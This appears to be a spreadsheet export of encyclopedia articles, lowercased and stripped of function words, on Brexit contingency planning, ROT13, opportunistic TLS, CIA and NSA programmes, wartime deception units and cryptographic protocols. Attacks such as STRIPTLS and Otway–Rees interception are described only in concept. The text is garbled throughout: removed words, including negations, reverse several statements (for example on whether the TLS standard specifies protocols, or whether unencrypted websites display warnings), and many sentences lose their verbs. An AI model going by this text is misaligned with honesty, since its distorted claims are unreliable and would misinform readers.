first minister scotland, nicola sturgeon. sentiments echoed first minister wales, mark drakeford. march confidential cabinet documents operation yellowhammer obtained guardian newspaper. document warned ministers could need work 22.5-hour days, departments would work hours least twelve weeks without input higher government. source knowledge operation said that, although planning stepped overall picture remained chaotic "rudderless". august 2019 leak mid-august 2019 official cabinet yellowhammer document earlier month leaked. paper gave base-case planning assumptions event no-deal brexit could lead food, medicine petrol shortages, hard border island ireland, "three-month meltdown" ports unable cope extra checks. there could protests requiring police action, thousands jobs could lost refineries closed. government ministers disputed report dismissed warnings "worst-case". sunday times, according observer, said senior whitehall source said "this project fear, realistic assessment public face deal. these likely, basic, reasonable scenarios worst case." september 2019 publication humble address passed house commons september 2019 requiring government house later 11.00pm wednesday september documents prepared within majesty's government since july 2019 relating operation yellowhammer submitted cabinet cabinet committee".in compliance, september government released five-page document entitled "operation yellowhammer: reasonable worst case planning assumptions august 2019". other change title "base scenario" "reasonable worst case planning assumptions" redacted paragraph reportedly dealing impact refining industry, document essentially identical leaked august. document subject two-hour long "brexit readiness operation yellowhammer" ministerial statement debate michael gove september, parliament resumed session supreme court failed prorogation attempted boris johnson. during debate opposition focused modification title, "base case" "worst case". petrol tariff revealed opposition members zero, concern expressed adrian bailey melanie losses uncompetitive british plant. also operation redfold, uk's post-brexit defence contingency plan operation brock, contingency plan handling potential cross channel freight roads congestion post-brexit brexit irish border notes references notes references external links national level planning document: reasonable worst case planning assumptions operation yellowhammer august 2019 national audit office, "contingency preparations exiting deal" report comptroller auditor general, "cabinet office: civil contingencies secretariat, contingency preparations exiting deal", 2058 session 2017–2019, march 2019, also isbn 9781786042491 subnational level kent: "chief constable's report kent performance delivery board", december 2018, section "brexit preparations" southend-on-sea: "report chief executive cabinet: brexit implications", january 2019, section "civil contingency planning" london: exit working group, transcript item contingency planning london prepares “no-deal” brexit", february 2019</t>
  </si>
  <si>
    <t>ROT13</t>
  </si>
  <si>
    <t>rot13 ("rotate places", sometimes hyphenated rot-13) simple letter substitution cipher replaces letter 13th letter alphabet. rot13 special case caesar cipher developed ancient rome. because letters (2×13) basic latin alphabet, rot13 inverse; undo rot13, algorithm applied, action used encoding decoding. algorithm provides virtually cryptographic security, often cited canonical example weak encryption.rot13 used online forums means hiding spoilers, punchlines, puzzle solutions, offensive materials casual glance. rot13 inspired variety letter word games online, frequently mentioned newsgroup conversations. description applying rot13 piece text merely requires examining alphabetic characters replacing letter places along alphabet, wrapping back beginning necessary.a becomes becomes becomes sequence continues beginning alphabet: becomes becomes becomes only letters occur english alphabet affected; numbers, symbols, punctuation, whitespace, characters left unchanged. because letters english alphabet rot13 function inverse: {\displaystyle {\mbox{rot}}_{13}({\mbox{rot}}_{13}(x))=x} basic latin-alphabet text x.in words, successive applications rot13 restore original text mathematics, sometimes called involution; cryptography, reciprocal cipher). transformation done using lookup table, following: example, following joke, punchline obscured rot13: chicken cross road? bgure fvqr!transforming entire text rot13 form, answer joke revealed: puvpxra pebff ebnq? side!a second application rot13 would restore original. usage rot13 special case encryption algorithm known caesar cipher, used julius caesar century bc.johann ernst elias bessler, 18th century clockmaker constructor perpetual motion machines, pointed rot13 encodes surname orffyre. used latinised form, orffyreus, pseudonym.rot13 net.jokes newsgroup early 1980s. used hide potentially offensive jokes, obscure answer puzzle spoiler. shift thirteen chosen values, three original caesar cipher, thirteen value encoding decoding equivalent, thereby allowing convenience single command both. rot13 typically supported built-in feature newsreading software. email addresses also sometimes encoded rot13 hide less sophisticated spam bots. also used circumvent email screening spam filtering. obscuring email's content, screening algorithm unable identify email instance, security risk, allows recipient's in-box. encrypted, normal, english-language text significant size, rot13 recognizable letter/word patterns. words "n", (capitalized only), "gur" (rot13 "a", "i", "the"), words ending "yl" ("ly") examples. rot13 intended used secrecy concern—the constant shift means encryption effectively key, decryption requires knowledge fact rot13 use. even without knowledge, algorithm easily broken frequency analysis. because utter unsuitability real secrecy, rot13 become catchphrase refer conspicuously weak encryption scheme; critic might claim "56-bit little better rot13 days". also, play real terms like "double des", terms "double rot13", "rot26", "2rot13" crop humorous intent (due fact that, since applying rot13 already rot13-encrypted text restores original plaintext, rot26 equivalent encryption all), including spoof academic paper entitled 2rot13 encryption algorithm". extension, triple-rot13 (used joking analogy 3des) equivalent regular rot13. december 1999, found netscape communicator used rot13 part insecure scheme store email passwords. 2001, russian programmer dimitry sklyarov demonstrated ebook vendor, paradigm research group (nprg), used rot13 encrypt documents; speculated nprg mistaken rot13 example—provided adobe ebook software development kit—for serious encryption scheme. windows uses rot13 registry keys. rot13 also used unix fortune program conceal potentially offensive dicta. letter games culture rot13 provides opportunity letter games. some words will, transformed rot13, produce another word. examples 7-letter pairs english language abjurer nowhere, chechen purpura. other examples words like shown table. pair gnat tang example words rot13 reciprocals reversals. 1989 international obfuscated code contest (ioccc) included entry brian westley. westley's computer program encoded rot13 reversed still compiles correctly. operation, executed, either perform rot13 encoding reverse input.the newsgroup alt.folklore.urban coined word—furrfu—that rot13 encoding frequently encoded utterance "sheesh". "furrfu" evolved mid-1992 response postings repeating urban myths alt.folklore.urban, posters complained "sheesh!" response newcomers overused. variants rot5 practice similar rot13 applies numeric digits rot13 rot5 used together message, sometimes called rot18 rot13.5. rot47 derivative rot13 which, addition scrambling basic letters, treats numbers common symbols. instead using sequence alphabet, rot47 uses larger characters common character encoding known ascii. specifically, 7-bit printable characters, excluding space, decimal '~', total, taken order numerical values ascii codes, rotated positions, without special consideration case. example, character mapped mapped larger alphabet produces thorough obfuscation rot13; example, telephone number +1-415-839-6885 obvious first sight scrambled result z'\c`d\gbh\eggd. hand, rot47 introduces numbers symbols without discrimination, immediately obvious text encoded. example: quick brown jumps over lazy dog.enciphers "f:4&lt; qc@h? yf&gt;ad ~g6c {2kj s@8]the library, standard routines available computer programming, contains function—memfrob()—which similar purpose rot13, although intended arbitrary binary data. function operates combining byte binary pattern 00101010 (42) using exclusive (xor) operation. this effects simple cipher. like rot13, (and therefore memfrob()) self-reciprocal, provides similar, virtually absent, level security. implementation rot13 rot47 fairly easy implement using unix terminal application encrypt string "the quick brown jumps over lazy dog" rot13: string rot47: emacs emacs, rot13 buffer selection following commands: text editor, rot13 buffer command: ggg?g python python, module implemented using rot13: module codecs provides 'rot13' text transform. ruby inputting array single string characters returns encoded message array characters(strings).this version uses ruby 2.5.5p157. parse byte perform rot13 ascii alpha character. also cryptanalysis atbash references external links online converter rot13, rot5, rot18, rot47, atbash caesar cipher. rot13 text puretables.com</t>
  </si>
  <si>
    <t>Operations Support Branch</t>
  </si>
  <si>
    <t>operations support branch (o.s.b.) unit cyberintelligence division central intelligence agency (c.i.a.). located ninth floor secret facility suburbs northern virginia, west washington, d.c. patrick radden keefe described o.s.b. cia's "secret hacker unit, cadre élite engineers create cyberweapons" june 2022 article yorker.the o.s.b. specialises physical access operations 'physical access' gained electronic devices owned high value individual targets foreign government officials terrorists. o.s.b. able quickly develop tools utilised cyberintelligence missions short notice.the o.s.b. filled workspace pranks, like stealing coworkers things, name calling, shoving matches, rubber band nerf wars. asked aware this, former head c.i.a.’s center cyber intelligence bonnie stith said not.the employees o.s.b. numbered dozen 2010s. radden keefe described extreme secrecy o.s.b. period resulting staff unable take work home, talk anyone outside day. their office classified sanctum, locked vault. like crew submarine, forged strong bonds—and strong antagonisms". software engineer joshua schulte employed o.s.b. 2010 2016. convicted leaker vault documents detail electronic surveillance cyber warfare tools developed c.i.a. schulte nicknamed 'voldemort' time o.s.b. leak publication vault documents significant blow c.i.a., senior official likened 'digital' equivalent attack pearl harbor scope fallout. references</t>
  </si>
  <si>
    <t>Opportunistic TLS</t>
  </si>
  <si>
    <t>opportunistic (transport layer security) refers extensions plain text communication protocols, offer upgrade plain text connection encrypted (tls ssl) connection instead using separate port encrypted communication. several protocols command named "starttls" purpose. form opportunistic encryption primarily intended countermeasure passive monitoring. starttls command imap pop3 defined 2595, smtp 3207, xmpp 6120 nntp 4642. irc, ircv3 working group defined starttls extension. uses command "auth tls" defined 4217 ldap defines protocol extension 2830. http uses upgrade header. layering application-neutral; words 5246: advantage application protocol independent. higher-level protocols layer protocol transparently. standard, however, specify protocols security tls; decisions initiate handshaking interpret authentication certificates exchanged left judgment designers implementors protocols tls.the style used specify matches layer distinction also conveniently supported several library implementations tls. e.g., 3207 smtp extension illustrates following dialog client server start secure session: &lt;waits connection port &lt;opens connection&gt; mail.example.org esmtp service ready ehlo client.example.org 250-mail.example.org offers warm welcome starttls starttls ahead &lt;starts negotiation&gt; &lt;negotiate session&gt; &lt;check result negotiation&gt; ehlo client.example.org last ehlo command issued secure channel. note authentication optional smtp, omitted server reply safely advertise auth plain smtp extension, present plain-text reply. ports besides opportunistic tls, number ports defined ssl-secured versions well-known protocols. these establish secure communications present communication stream identical un-encrypted protocol. separate ports advantage fewer round-trips; also less meta-data transmitted unencrypted form. some examples include: least email related protocols, 8314 favors separate ports instead starttls. weaknesses mitigations opportunistic opportunistic encryption mechanism. because initial handshake takes place plain text, attacker control network modify server messages man-in-the-middle attack make appear unavailable (called striptls attack). most smtp clients send email possibly passwords plain text, often notification user. particular, many smtp connections occur mail servers, user notification practical. september 2014, isps thailand found customers. october 2014, cricket wireless, subsidiary at&amp;t, revealed customers. this behavior started early september 2013 wireless, later merged cricket practice continued.striptls attacks blocked configuring smtp clients require outgoing connections (for example, exim message transfer agent require directive "hosts_require_tls"). however, since every mail server supports tls, practical simply require connections. example striptls attack type used thai mass surveillance technology: this problem addressed dns-based authentication named entities (dane), part dnssec, particular 7672 smtp. dane allows advertise support secure smtp tlsa record. this tells connecting clients require tls, thus preventing striptls attacks. starttls everywhere project electronic frontier foundation works similar way. however, dnssec, deployment complexities peculiar criticism, faced adoption rate protocol called smtp strict transport security mta-sts drafted group major email service providers including microsoft, google yahoo. mta-sts require dnssec authenticate dane tlsa records relies certificate authority (ca) system trust-on-first-use (tofu) approach avoid interceptions. tofu model reduces complexity without guarantees first offered dnssec. addition, mta-sts introduces mechanism failure reporting report-only mode, enabling progressive roll-out auditing compliance. popularity following revelations made edward snowden light global mass surveillance scandal, popular email providers bettered email security enabling starttls. facebook reported enabling starttls encouraging providers same, facebook discontinued email service february 2014, outbound email encrypted perfect forward secrecy strict certificate validation. references external links secure email tests tools verify starttls real-time dialog like example verify receiving domain starttls enabled email security level margolis, daniel; risher, mark; ramakrishnan, binu; brotman, alexander; jones, janet. "smtp strict transport security (mta-sts)". ietf. mechanism enabling mail service providers declare ability receive transport layer security (tls) secure smtp connections.</t>
  </si>
  <si>
    <t>Opportunistic encryption</t>
  </si>
  <si>
    <t>opportunistic encryption (oe) refers system that, connecting another system, attempts encrypt communications channels, otherwise falling back unencrypted communications. this method requires pre-arrangement systems. opportunistic encryption used combat passive wiretapping. active wiretapper, hand, disrupt encryption negotiation either force unencrypted channel perform man-in-the-middle attack encrypted link.) provide strong level security authentication difficult establish secure communications mandatory. however, make encryption internet traffic easy implement, removes significant impediment mass adoption internet traffic security. opportunistic encryption internet described 4322 "opportunistic encryption using internet exchange (ike)", 7435 "opportunistic security: some protection most time", 8164 "opportunistic security http/2". routers frees/wan project early proponents effort continued former freeswan developers working libreswan. libreswan aims support different authentication hooks opportunistic encryption ipsec. version 3.16, released december 2015, support opportunistic ipsec using auth-null based 7619. libreswan project currently working (forward) domain name system security extensions (dnssec) kerberos support opportunistic ipsec. openswan also ported openwrt project. openswan used reverse records facilitate exchange systems. possible openvpn networking protocols dynamic links similar specific domains. linux unix-like systems frees/wan forks openswan strongswan offer vpns also operate mode using ipsec based technology. obfuscated another method implementing windows microsoft windows platforms implementation installed default. this method uses ipsec secure traffic simple procedure turn accessed security policies local computer" editing properties assign "(request security)" policy. this turn optional ipsec kerberos environment. many systems also problems either side behind nat. this problem addressed traversal (nat-t) accomplished adding dword registry: hklm\system\currentcontrolset\services\ipsec\assumeudpencapsulationcontextonsendrule using filtering options provided mmc, possible tailor networking require, request permit traffic various domains protocols encryption. e-mail opportunistic encryption also used specific traffic like e-mail using smtp starttls extension relaying messages across internet, internet message access protocol (imap) starttls extension reading e-mail. with implementation, necessary obtain certificate certificate authority, self-signed certificate used. 2595 using imap, pop3 acap 3207 smtp service extension secure smtp starttls postfix starttls exchangemany systems employ variant third-party add-ons traditional email packages first attempting obtain encryption unsuccessful, sending email clear. pgp, p≡p, hushmail, ciphire, among others work mode. practice, starttls smtp often deployed self-signed certificates, represents minimal one-time task system administrator, results email traffic opportunistically encrypted. voip some voice (voip) solutions provide painless encryption voice traffic possible. some versions sipura technology linksys lines analog telephony adapters (ata) include hardware implementation srtp installation certificate voxilla, voip information site. when call placed attempt made srtp, successful series tones played handset, call proceeds without using encryption. skype amicima secure connections gizmo5 attempts secure connection clients. phil zimmermann, alan johnston, callas proposed voip encryption protocol called zrtp. they implementation called zfone whose source compiled binaries available. websites encrypting www/http connections, https typically used, requires strict encryption significant administrative costs, terms initial setup continued maintenance costs website operator. most browsers verify webserver's identity make sure certificate signed trusted certificate authority expired, usually requiring website operator manually change certificate every years. easiest enable sort opportunistic website encryption using self-signed certificates, causes browsers display warning time website visited unless user manually marks website's certificate trusted. because unencrypted websites currently display warnings, self-signed certificates well received. 2015, mozilla started roll opportunistic encryption firefox version this quickly rolled back update 37.0.1) serious vulnerability could bypass certificate verification.browser extensions like https everywhere httpsfinder find automatically switch connection https possible. several proposals available true, seamless opportunistic encryption http/2 protocol. these proposals later rejected. poul-henning kamp, lead developer varnish senior freebsd kernel developer, criticized ietf following particular political agenda http/2 implementing opportunistic encryption standard. weaknesses starttls implementations often used smtp vulnerable striptls attacks subject active wiretapping. also john gilmore multi-factor authentication opportunistic opportunistic wireless encryption (owe) security level security level management tcpcrypt references external links enabling email confidentiality opportunistic encryption simson garfinkel laboratory computer science, 2003 windows article nat-t dh2048 4322 opportunistic encryption using internet exchange (ike) 7258 pervasive monitoring attack</t>
  </si>
  <si>
    <t>Ops (B)</t>
  </si>
  <si>
    <t>allied military deception planning department, based united kingdom, second world war. colonel jervis-read april 1943 department chief staff supreme allied commander (cossac), operational planning department focus western europe. that year, allied high command decided main allied thrust would southern europe, tasked tying german forces west coast general, drawing luftwaffe particular. department's first operation three-pronged plan called operation cockade, elaborate ploy threaten invasions france norway. cockade much success. main portion operation, deceptive thrust boulogne region named operation starkey, intended draw german arm, failed elicit response. plan undermined fact allied push towards france year obviously unlikely. january 1944, cossac absorbed shaef survived transition, expanding process. colonel wild took jervis-read (who became deputy) reorganised department sections: operations intelligence. refreshed department given control double agents avenues disinformation. tasked operational planning main portion operation bodyguard, deception plan cover 1944 normandy landings, named operation fortitude. early 1944 david strangeways joined 21st army (the invasion force); strangeways clashed wild, ended rewriting major portions fortitude. eventually relegated role managing information flowing disinformation channels. background march 1943, general frederick morgan appointed chief staff supreme allied commander (designate) (cossac), tasked operational planning northwest europe. morgan's operational orders allied high command, received april, referred elaborate camouflage deception" dual keeping german forces west, drawing luftwaffe battle. cross-channel invasion already postponed 1944, main allied push year toward southern europe. morgan's overall task help keep enemy away fighting.in principle, overall deception strategy across theatres fell london controlling section, whitehall department established 1941 colonel john bevan. bevan convinced morgan establish specialist deception section staff conduct operational planning western front. however, morgan's hierarchy accommodate department. instead, within "g-3" operations division april 1943, colonel john jervis-read appointed head. concept inspired early successes deception dudley clarke force mediterranean theatre. however, morgan disliked clarke's department (referring "private army") jervis-read given limited resources.bevan intended focus physical deception, existing groups handling double agents, intelligence officer assigned. major roger fleetwoord-hesketh seconded another part cossac intermediary committee handing double agents. department also assigned americans planning department, lieutenant colonel percy lash major melvin brown. cockade department's first assignment operation cockade, deception intended draw german attention balkans threatening invasions france norway. cockade success. operation originally thought london controlling section and, departmental structure, tasked operational planning.cockade consisted three operations throughout 1943, variously threatening invasions norway, boulogne brest. centrepiece operation starkey, included major bombing campaign prior cross-channel amphibious "invasion". feint failed elicit response enemy, already made mind allied action year would focused mediterranean.one outcome 1943 (and failure cockade) control operational deception western theatre fixed umbrella (b). previously various groups involved executing deception strategy, mixed results. bodyguard following cockade, drafting deception plans operation overlord. reality task fell london controlling section, account lacking resources. however, december 1943 eisenhower appointed supreme commander january 1944 decided new, experienced, head needed (b). noel wild, clarke's deputy force, drafted replace jervis-head (who became wild's deputy). wild completely re-organised department, dividing branches: operations intelligence. jervis-head became head operations division whilst lieutenant-colonel roger fleetwood-hesketh took charge intelligence division. lash brown left operations returned (a), temporary loan. liaison, major christopher harmer, joined hesketh's intelligence section, civilian secretary hesketh's brother cuthbert.with resources able take local planning overlord deception plan, operation bodyguard. wild began laying strategy operation fortitude, portion bodyguard would convince germans threat norway calais. january 1944, granted membership twenty committee, group controlled double agents britain western europe. from material sent double agents german handlers created individual agent's handlers.on february, general eisenhower issued fortitude directive, outlined would responsible implementing north south portions fortitude plan. scottish command tasked fortitude south, whilst joint chiefs 21st army group given fortitude south. plans, special means handled shaef (b). field marshal montgomery, head 21st army group, brought david strangeways (another force alumni.) command force. tasked implementing fortitude deception. strangeways almost immediately objected (b)'s outline, fact rewrote fortitude south liking. (b)'s operations sub-section staff, period, relegated role courier groups implementing fortitude north south, ensure message plans consistent other. contrast, department's intelligence section solely responsible information disseminated double agents, resulting constant stream communication shaef force (roger fleetwood-hesketh recounts brother made almost daily courier trips london portsmouth).in operations section added four members. three americans lieutenant colonel frederic barnes major moody captain john corbett englishman. hood another force alumni working clarke's tactical deception groups (tac italy. post-invasion july, force tied running deception continent, control fortitude south returned directly (b). wild decided split groups. forward section based france, consisting jervis-read others, responsible managing plans field. wild kept remainder team back london manage operations planning september, shaef moved base versailles (b)'s american staff returned home. wild moved bulk team versailles, leaving hood command london.in june begun work fortitude south created american army group (susag) replace fusag threat calais. story aimed sell germans allies, less resistance planned, moved fusag elements france intended defeat germany normandy. strangeways, before, objected plan several grounds rewrote susag activated never used (instead fusag continued maintain threat calais). impact between january february 1944, july onwards, wild significant authority deception misinformation western front. however, (b)'s impact success bodyguard debated. wild criticised "useless" whilst strangeways deliberately frustrated wild (for personal dislike) every turn. strangeways, along others, identified problems bodyguard plan outlined lcs. significant pressure shaef re-written specification. also list staff notes references bibliography bond, brian (2004). "morgan, frederick edgworth (1894–1967)". oxford dictionary national biography (online ed.). oxford university press. doi:10.1093/ref:odnb/35103. (subscription public library membership required.) crowdy, terry december 2011). deceiving hitler: double cross deception world osprey publishing. isbn 978-1-84603-135-9. hesketh, roger (1999). fortitude: d-day deception campaign. ermin's press. isbn 0-316-85172-8. hinsley, f.h.; simkins, c.a.g. (1990). british intelligence second world security counter-intelligence. york: cambridge university press. isbn 0521394090. holt, thaddeus (2004). deceivers: allied military deception second world war. scribner. isbn 0-7432-5042-7. howard, michael (1990). british intelligence second world war: strategic deception publ. ed.). great britain: hmso. isbn 0-11-630954-7. latimer, john (2001). deception war. york: overlook press. isbn 978-1-58567-381-0. mure, david (1980). master deception: tangled webs london middle east. kimber. isbn 0-7183-0257-5.</t>
  </si>
  <si>
    <t>Opt-in email</t>
  </si>
  <si>
    <t>opt-in email term used someone initially added emailing list instead given option join emailing list. typically, sort mailing list, newsletter, advertising. opt-out emails permission send emails, emails typically criticized unsolicited bulk emails, better known spam. forms there several common forms opt-in email: unconfirmed opt-in/single opt-in someone first gives email address list software (for instance, page), steps taken make sure address belongs person submitting this cause email mailing list considered spam simple typos email address cause email sent someone else. malicious subscriptions also possible, subscriptions spammers forging email addresses sent email address used subscribe mailing list. confirmed opt-in (coi)/double opt-in (doi) subscriber asks subscribed mailing list, unlike unconfirmed single opt-in, confirmation email sent verify really them. generally, unless explicit step taken verify end-subscriber's e-mail address, clicking special link sending back reply email, difficult establish e-mail address question indeed belongs person submitted request receive e-mail. using confirmed opt-in (coi) (also known double opt-in) procedure helps ensure third party able subscribe someone else accidentally, malice, since action taken part e-mail recipient, simply longer receive messages list operator. mail system administrators non-spam mailing list operators refer confirmed subscription closed-loop opt-in. some marketers call closed-loop opt-in "double opt-in". this term coined marketers late differentiate call "single opt-in", subscriber email list gets confirmation email telling begin receive emails take action. some marketers contend "double opt-in" like asking permission twice constitutes unnecessary interference someone already said want hear marketer. however, drastically reduce likelihood someone signed email list another person. double opt-in method used email marketers ensure quality list adding extra stop verification process.the can-spam 2003 require opt-in approach, easy opt-out system. opt-in required many european countries elsewhere. turns confirmed opt-in prove person actually opted challenged legally. opt-out instead giving people option list, automatically option request taken out. this approach illegal european union many jurisdictions. address authentication email address authentication technique validating person claiming possess particular email address actually this normally done sending email containing token address, requiring party authenticated supply token authentication proceeds. email containing token usually worded explain situation recipient discourage supplying token (often visiting url) unless fact attempting authenticate. example, suppose party, alice, operates website visitors make accounts participate gain access content. another party, bob, comes website creates account. supplies email address contacted, alice know truthful (consciously not) address. alice sends token bob's email address authentication request, asking click particular recipient mail making account alice's website. receives mail clicks url, demonstrating alice controls email address claimed have. instead hostile party, chuck, visit alice's website attempting masquerade bob, would unable complete account registration process confirmation would sent bob's email address, chuck access. wikipedia uses mechanism too. best practice step email address verification (confirmation) considered many anti-spam advocates minimum degree necessary opt-in email advertising ongoing email communication. also closed-loop authentication email marketing references</t>
  </si>
  <si>
    <t>PKCS</t>
  </si>
  <si>
    <t>cryptography, pkcs stands "public cryptography standards". these group public-key cryptography standards devised published security llc, starting early 1990s. company published standards promote cryptography techniques patents, algorithm, schnorr signature algorithm several others. though industry standards (because company retained control them), standards recent years begun move "standards-track" processes relevant standards organizations ietf pkix working-group. also cryptographic message syntax references generaljean-sébastien coron, marc joye, david naccache, pascal paillier (2000). "new attacks pkcs v1.5 encryption" (pdf). eurocrypt. 369–381.{{cite web}}: maint: multiple names: authors list (link) external links about pkcs (appendix 3447) oasis pkcs (technical committee home page)</t>
  </si>
  <si>
    <t>Otway–Rees protocol</t>
  </si>
  <si>
    <t>otway–rees protocol computer network authentication protocol designed insecure networks (e.g. internet). allows individuals communicating network prove identity also preventing eavesdropping replay attacks allowing detection modification. protocol specified follows security protocol notation, alice authenticating using server session-identifier, nonces): {\displaystyle a\rightarrow b:m,a,b,\{n_{a},m,a,b\}_{k_{as}}} {\displaystyle b\rightarrow s:m,a,b,\{n_{a},m,a,b\}_{k_{as}},\{n_{b},m,a,b\}_{k_{bs}}} {\displaystyle s\rightarrow b:m,\{n_{a},k_{ab}\}_{k_{as}},\{n_{b},k_{ab}\}_{k_{bs}}} {\displaystyle b\rightarrow a:m,\{n_{a},k_{ab}\}_{k_{as}}} note: steps authenticate this protocols analysed burrows, abadi needham paper introduced early version burrows–abadi–needham logic. attacks protocol there variety attacks protocol currently published. interception attacks these attacks leave intruder session exclude parties conversation. boyd observe original description require check plaintext ciphertexts. this allows intruder masquerading intercept first message, send second message constructing second ciphertext using naming plaintext. protocol ends sharing session intruder rather gürgens peralta describe another attack name arity attack. attack intruder intercepts second message replies using ciphertexts message message absence check prevent perhaps m,a,b) becomes session known intruder. cole describes gürgens peralta arity attack another attack book hackers beware. intruder intercepts first message, removes plaintext uses message omitting messages this leaves communicating intruder using m,a,b) session key. disruptive attacks this attack allows intruder disrupt communication allow intruder gain access problem protocol malicious intruder arrange different keys. here how: execute first three messages, received {\displaystyle k_{ab}} intruder intercepts fourth message. resends message results generating {\displaystyle k'_{ab}} subsequently sent intruder intercepts message too, sends part would sent finally received expected fourth message, {\displaystyle k'_{ab}} instead {\displaystyle k_{ab}} also kerberos (protocol) needham–schroeder protocol yahalom (protocol) wide mouth frog protocol references</t>
  </si>
  <si>
    <t>RAMPART-A</t>
  </si>
  <si>
    <t>rampart-a code name global mass surveillance world-wide signals intelligence partnership program united states national security agency (nsa). program "gain access high-capacity international fiber-optic cables transit major congestion points around world".nsa working secret cooperation partner countries, hosting u.s. equipment providing access fiber-optic cables. 2013 program "access terabits second data streaming world-wide encompasses communication technologies voice, fax, telex, modem, email internet chat, virtual private network (vpn), voice (voip), voice call records" total partner countries including european union member states.there conditions partnership partner country making agreement. first partner countries nsa's technology collect data u.s. citizens. second access granted partner countries collect data host countries' citizens. although conditions exceptions, state exceptions are. according edward snowden, agreements partner countries vague easily circumvented.the program publicly revealed june 2014, danish newspaper dagbladet information intercept. revelation program based part leaks former contractor edward snowden. according nsa's classified intelligence briefing 2010, rampart-a used across analysis production lines, previous year (2009), 9000 intelligence reports written based solely rampart-a data. program cost $170 million 2011 2013. program started 1992.xkeyscore implemented program's architecture. partners partner countries divided groups cooperation level, "second" "third".for host partner country, u.s. provides processing analysis tools equipment, means partner countries able nsa's tools processing analysing data flows country. it's likely every partner country rampart-a site(s); 2013 least rampart-a sites, nine active state. three largest sites, azurephoenix, spinneret moonlightpath gathers traffic different cables networks.second level (partners five eyes) partner countries: australia canada zealand united kingdomthird level partner countries: algeria austria belgium croatia czech republic denmark ethiopia finland france germany greece hungary india israel italy japan jordan south korea macedonia netherlands norway pakistan poland romania saudi arabia singapore spain sweden taiwan thailand tunisia turkey united arab emirates also 2013 mass surveillance disclosures list government surveillance projects mass surveillance xkeyscore operation eikonal echelon prism references</t>
  </si>
  <si>
    <t>P Service</t>
  </si>
  <si>
    <t>service (italian: servizio organization propaganda, surveillance troop welfare within royal italian army. commissioned beginning 1918 italian high command. under leadership luigi cadorna thought important deploy propaganda motivate educate soldiers. after defeat caporetto, commander armando diaz appreciated need motivate soldiers.: impact caporetto well serious military defeat, caporetto interpreted failure italian society whole political direction army; soldiers largely unaware aims fighting. after caporetto, first time, large sums allocated propaganda army, service deliver this service task watching morale, wellbeing mental condition soldiers, assisting communicating families motivating fight. task several hundred special designated officers drafted army. service proved great importance final decisive months war, bringing significant improvements moral material conditions soldiers previously subjected punitive regime absolute obedience. after caporetto, officers established trench newspapers, developed network soldiers' houses organised classes combat illiteracy.: organization march 1918 first propaganda services began within italy’s armies. officers charge variously called "liaison officers front lines", "consultant" officers, "ip" officers (information propaganda) finally simply officers.: badoglio took task rebuilding army morale, building many ideas former commander capello. badoglio went beyond capello’s initiatives however, recommending "spiritual bond" officers soldiers. from march 1918, surveillance propaganda system operation information offices different armies, high command issued circular unified structures, adopted name "servizio across board, following example army.: offices established high command services individual armies reported. information office, section" responsible monitoring morale troops. press propaganda office, section" responsible preparing printed material dropped enemy providing assistance propaganda italian military. officers signed circulars service badoglio, head information service, colonel odoardo marchetti, head press propaganda office, lieutenant colonel it:eugenio barbarich.: under offices, section operated separate army, degree autonomy. these sections issued directives service, well coordinating supervising work subsections. addition providing advice officers also printed factsheets, commentaries, “talking points” “meeting ideas” them. addition, every fifteen days section army sent report high command work done morale soldiers.: within army officers assigned every level. division, regiment, group, battalion, unit, officer charge carrying directives issued higher bodies. these officers therefore created trust network among troops surveillance purposes core collaborators propaganda work. these officers sent periodic reports subsections, copied command seconded. well transmitting messages headquarters, monitored information postal censorship offices, military lawyers health directors, passing indicators troops’ mood wellbeing. they also received redistributed goodwill parcels donated public charities entities. this allowed maintain close contact troops. estimated autumn 1918 around thousand officers operating throughout italy's armies. this number increased armistice officers assigned carry propaganda investigations among population occupied territories.: 30–31 p-services army before high command issued order single organizational structure, propaganda services left initiative individual army. army emanuele filiberto, duke aosta army mario nicolis robilant pioneers regard. army army guglielmo pecori giraldi surveillance propaganda service march, called service". this later became official term used various offices different armies. well name, army came closest concept later used high command. "liaison officers front lines" created, numbered thirty three army corps 1918, total hundred officers. army issued directives ensure officers able capture morale mood before, action, order able promptly warn potential crisis. propaganda boost morale left judgment officers themselves.: assistance troops limited control food distribution, care wounded writing letters comfort families fallen hospitalized serious conditions.: army after caporetto remains army commanded capello reconstituted recruits army. army built beyond piave corps general it:giuseppe pennella. march 1918 propaganda service called "consulting service", department information office called "consulting section", "consultant officers". little known workings services june enrico caviglia assumed command, bringing it:giuseppe lombardo radice army lead service. october caviglia issued regulations requiring officer subsection send daily reports emphasising critical importance vigilance. reinforce point, royal carabinieri brought supervise personnel offices.: army april 1918 intelligence service army approved lectures civilian non-military speakers strengthen morale men, began widespread distribution patriotic material.: army january 1918 army "propaganda office" army command assist officers lower commands chosen talk soldiers. they gave lectures encourage soldiers talk comrades, spreading conversational themes trying make propaganda acceptable. initiatives armies, combined capello's army, limited propaganda involve troop support surveillance.: army army created remains army. after initial period giulio cesare tassoni, command assumed mario nicolis robilant, divisional propaganda centers called "specialized executive bodies". these propaganda tasks, we’re responsible vigilance soldiers. 1918, it:paolo morrone taken nicolis robilant, army renamed army. circular june provided continuation surveillance propaganda service army, called service", section information office called department" section large units army intendency called "propaganda center". officers attached offices known service officers". circular, read barbarich, persuaded high command establish general provisions make services across armies standard.: 6th-12th armies when army luca montuori formed march four corps, three came army, maintained service structure army. army it:giulio tassoni waited august setting surveillance propaganda service. there known documentation possible propaganda services 10th army earl cavan 12th jean césar graziani, conceivable corps, moved armies, brought service organisations established part armies.: 92–3 trench newspapers february 1918 high command issued circular 1117 concerning patriotic propaganda document widely considered starting point service. march colonel odoardo marchetti issued second circular 2293 section approved dissemination political newspapers circulation trench newspapers. trench newspapers existed since early 1915, publication organised wide made them. between february beginning march 1918 italy began copy propaganda initiatives already undertaken armies. austria-hungary army filling italian trenches posters leaflets; government united states shown great skill mobilizing american public opinion war, allies well advanced work developing counter-propaganda towards enemy. italy behind every respect, trench newspapers appeared regularly scale 1918.: 466–7 first large circulation paper tradotta, weekly army, appeared march, month army intelligence service started giberna. next ghirba army. added many others, linked gradually smaller units, eventually numbering around fifty total.: time, distribution large quantity national newspapers authorized, military authorities agreed publishers include articles suitable propaganda among troops. army bought copies bulk cents each, selling troops cents; given away free soldiers would trusted read.: levels illiteracy time created doubts effectiveness trench newspapers; summer 1918 high command lost much confidence them, began recommending suspension slowdown distribution.: other propaganda channels main form propaganda word mouth officers talking junior officers, turn communicated ideas private soldiers. this depended individual capabilities, officers’ charisma willingness soldiers listen, record effectiveness. know contents "talking points" officers used, sure intended encourage ordinary soldiers part conversation.: 129–30 1918 high command decided postcards carry propaganda images well traditional ones. each soldier 